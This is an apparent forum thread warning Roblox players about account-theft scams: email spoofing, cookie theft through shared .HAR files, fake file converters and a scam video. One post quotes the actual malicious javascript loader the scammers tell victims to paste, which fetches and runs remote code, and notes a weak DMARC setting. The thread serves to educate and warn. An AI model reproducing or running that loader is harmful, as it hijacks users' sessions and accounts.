I appreciate u reminding us of this
Two words, cookie grabbing. It should be mentioned anyone suspicious, e.g scammers are getting players to follow a tutorial for them just release a file that includes their cookie for example (.HAR file)
Just also to add something to the post I highly recommend you checking if the email is a real Roblox email and is not just an email address owned by Roblox being spoofed. If you do not know what email spoofing is it is basically just someone sending messages from a domain which looks like they are from a domain they donāt own (it will not really be sent from that domain it is just the way emailās work makes them look like they have came from the user) Highly unlikely with Roblox due to them only using the main domain for emails I believe however someone could spoof an email with a sub domain (e.g security.roblox.com) due to the dmarc record being set to ānoneā.
@lycheeperson10 Someone at Roblox might wanna look at above! Not a major issue due to the main domain name having a dmarc record set to none and the sub domain not being used really but still someone could trick others using this!
If your unsure how to check if an email is being spoofed highly or just to learn more about how emails can be spoofed recommend this YouTube vid below:
Iirc they are already encrypted although there isnāt much point in that because they are accepted as encrypted when authenticating
There is another type of hacking that is going around. Basically the hacker deceives you into pasting javascript into the search bar.
The Details
This is the code that one particular video tells you to paste. DO NOT PASTE THIS CODE (just for education purposes and for employees to see): +Javascript:$.get(ā//configureā+āroblox.com/api/catalog/promo/halloween50newuser.jsā) They make it actually look a little legit for the untrained eye.
The problem is made worse by videos like these.
Here is the video link. DO NOT FOLLOW THE STEPS IN THE VIDEO, YOU WILL GET HACKED.
ROBLOX- GET ANY ITEM ON THE CATALOG FOR 50% OFF (HEADLESS HORSEMAN FOR 15,500 R$!) - YouTube
This video has been up for years and has over 100k views. This is an example of one of the many hacking methods I commonly see.
How would you do that? Roblox already enforces the httpOnly flag on security cookies to lower the chances of an xss attack. Cookies are stored on your pc so for example if a player is tricked to install something like āfree robux appā they can steal the cookies
So as a general rule, all Roblox URLs will contain ā[something].roblox.comā. Ie. create.roblox.com, developer.roblox.com, as well as www.roblox.com among others.
The main point is to be aware of URLs which contain variants such as āroblox.com.[something]ā as an example.
That is official for mobile links. We are looking into standardizing them going forward. Stay tuned!
I have never had the option in the US
What exactly do you mean by this? I would like it to use share.roblox.com, but itās completely empty. ro.blox.com returns an unauthorized error, and blox.com returns to the homepage.
edit: It changed, it used to be an empty API endpoint, but now it returns āOKā.
If youāre looking into educating users on off-site scams, you should add something regarding the .har file scam. There are two Iāve come across personally:
1- Person says theyāll give you Robux in exchange for your āavatar fileā, they get you to upload a .har file to a āhar to objā converter, which in reality uploads it to a database somewhere. They usually attach a video of someone following this process, this video usually depicts a clip of someone rich/reputable doing this (which is usually just clips taken out of context, mashed together to create a surprisingly believable product) for the person being scammed to trust this person.
2- A person messaged me on discord with the same type of message (avatar to be used in-game), however instead of uploading the file to a .har to .obj āconverterā, you upload the .har file directly to them on discord.
Just donāt upload any files to strangers on the internet, especially if these people message you randomly.
Do .har files contain your cookie or something? As far as I know your har file is just your avatar.
Due to the way that email is designed, itās pretty easy to spoof emails that look like legitimate emails. The trick though, is origin, where the address to @roblox.com emails would point to an email server that originates from Roblox. Still, you can send a perfectly legit looking email using a @roblox.com email through spoofing. So, personally, this point only applies to very rudimentary phish attempts.
ā
Otherwise, majority of these issues stem from Robloxās young user base which are predominantly not actual developers where the visibility of this announcement/PSA will not reach the members whoāre actively being targeted. In regards to that, the platform needs to do more in targeting these announcements to actual players instead of just developers.
This is an issue on the majority of platforms but, at some point a line needs to be drawn and the user who fell for said phish needs to take responsibility for their own actions. That is how the world works. I feel that Roblox is essentially trying to make up for the lack of online safety instruction that parents shouldāve taught. Unfortunately, losing something is how you grow and hopefully, how you realize that certain actions you make can lead to serious consequences.
Regardless of how anyone tries to spin it, how a phish attempt is engineered or whatnot, this platform is specifically designed in such a way where you have to give your details to them. If they successfully get your details, itās simply because you gave it to them. Whether you realize that or not, is completely up to you and unfortunately, probably too late.
The only way for this not to be the case is if your details are leaked either through you, a friend, etc, through a breach on Robloxās end or if we really wanted to be radical, someone tapping your connection between your router / phone to an ISP / Tower.
I see a lot of people on this platform blame Roblox for having poor security and while, I agree in some aspects, this in particular is not their fault. Every company faces these issues and everyone is susceptible. However, most platform users take responsibility because the age deems it so. On this platform, itās incredibly toxic and turns into āomg Roblox security sucks, give me my account backā.
Start solving this problem by getting younger users to understand / conceptualize responsibility and what it means to be responsible for your account. With the guides and such in place already regarding this topic, thereās really nothing else this platform should be doing.
The solution here is simple: If you really value your account, donāt trust anyone with it but you.
Edit: Free will on an open forum dictates expressional freedom. Take this how you want. This is my personal view on said topic. This is not aimed toward anyone. It does not mean to offend anyone. Itās simply, quite plainly, how I feel about this.
Har file (HTTP dump) contain captured data from your web browser. Itās typically used to debug, performance bottleneck review, etc but, people have been using it to grab cookies. Data, including all network information, is captured on a per-session basis. This means that any data sent from between the client (browser) and Robloxās servers are captured on this file. This includes headers (where cookies are passed), urls, etc. If anyone asks you for a har file, theyāre definitely malicious.
No longer an issue.
(Intentional)
Itās a good security measure that IP changes invalidate the cookie but it seems a bit inconsistent? Personally, using a VPN hasnāt logged me out. Even if it did, I still wouldnāt want anyone having my cookie anyway, itās also a good idea to advise people that these scams do exist anyway.
It doesnāt depend on your IP. The title of the bug report is misleading. Its based on your location change.
Letās say your IP Changes to another ip thats in the same state or country as you are. Thereās a chance that it wonāt log you out.
But letās say your IP Changes from the US to the UK. Then it will invalidate the cookie.
Ohhh okay that makes more sense. On the chance that the person attempting to gain access to my account is somewhere near me (country is somewhat likely, province isnāt), I would still refrain from giving the cookie lmao. Regardless, it still is a good and frankly much needed security measure.